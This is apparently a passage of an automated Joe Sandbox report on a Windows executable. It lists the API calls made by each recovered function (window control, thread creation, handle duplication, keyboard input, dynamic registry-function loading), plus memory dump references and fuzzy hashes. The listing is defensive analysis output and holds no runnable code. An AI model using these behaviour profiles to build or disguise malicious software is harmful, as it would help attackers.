                        • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$FocusMessageSend
                        • String ID:
                        • API String ID: 3429747543-0
                        • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                        • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                        • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                        • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                        APIs
                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • _memset.LIBCMT ref: 00401C62
                        • _wcsncpy.LIBCMT ref: 00401CA1
                        • _wcscpy.LIBCMT ref: 00401CBD
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                        • String ID: Line:
                        • API String ID: 1620655955-1585850449
                        • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                        • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                        • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                        • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                        • GetVolumeInformationW.KERNEL32 ref: 0045D3B3
                        • __swprintf.LIBCMT ref: 0045D3CC
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu$HH
                        • API String ID: 3164766367-3924996404
                        • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                        • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                        • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                        • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                        APIs
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Msctls_Progress32
                        • API String ID: 3850602802-3636473452
                        • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                        • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                        • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                        • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                        • String ID:
                        • API String ID: 3985565216-0
                        • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                        • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                        • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                        • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00415737
                        • __calloc_crt.LIBCMT ref: 00415743
                        • __getptd.LIBCMT ref: 00415750
                        • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                        • __dosmaperr.LIBCMT ref: 004157A9
                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                        • String ID:
                        • API String ID: 1269668773-0
                        • Opcode ID: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                        • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                        • Opcode Fuzzy Hash: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                        • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                        APIs
                          • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                          • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                        • DuplicateHandle.KERNEL32 ref: 0043912C
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                        • DuplicateHandle.KERNEL32 ref: 00439145
                        • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                        • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                        • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                        • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                        • ExitThread.KERNEL32 ref: 004156BD
                        • __freefls@4.LIBCMT ref: 004156D9
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 4166825349-0
                        • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                        • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                        • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                        • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00434134
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                        • API String ID: 2574300362-3261711971
                        • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                        • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                        • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                        • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                        • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                        • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                        • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                        APIs
                        • GetClientRect.USER32(?,?,00000000,FFFFFFFF,00000000,?), ref: 00433724
                        • GetWindowRect.USER32(00000000,?), ref: 00433757
                        • GetClientRect.USER32(0000001D,?,00000000,FFFFFFFF,00000000,?), ref: 004337AC
                        • GetSystemMetrics.USER32(0000000F), ref: 00433800
                        • GetWindowRect.USER32(?,?), ref: 00433814
                        • ScreenToClient.USER32(?,?), ref: 00433842
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$MetricsScreenSystem
                        • String ID:
                        • API String ID: 3220332590-0
                        • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                        • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                        • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                        • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _malloc_wcslen$_strcat_wcscpy
                        • String ID:
                        • API String ID: 1612042205-0
                        • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                        • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                        • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                        • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$InputSend
                        • String ID:
                        • API String ID: 2221674350-0
                        • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                        • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                        • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                        • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscpy$_wcscat
                        • String ID:
                        • API String ID: 2037614760-0
                        • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                        • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                        • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                        • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                        APIs
                        • BeginPaint.USER32(00000000,?), ref: 00447B9D
                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                        • ScreenToClient.USER32(?,?), ref: 00447C39
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                        • EndPaint.USER32(?,?), ref: 00447CD1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 4189319755-0
                        • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                        • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                        • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                        • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                        • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                        • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID:
                        • API String ID: 1726766782-0
                        • Opcode ID: c1ec9ae3b7636be9c2ed14897d46e9f0c99212705f89a793b623582441198c13
                        • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                        • Opcode Fuzzy Hash: c1ec9ae3b7636be9c2ed14897d46e9f0c99212705f89a793b623582441198c13
                        • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                        APIs
                        • ShowWindow.USER32(?,00000000), ref: 004410F9
                        • EnableWindow.USER32(?,00000000), ref: 0044111A
                        • ShowWindow.USER32(?,00000000), ref: 00441183
                        • ShowWindow.USER32(?,00000004), ref: 00441192
                        • EnableWindow.USER32(?,00000001), ref: 004411B3
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                        • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                        • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                        • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                        APIs
                        • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                        • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                        Memory Dump Source
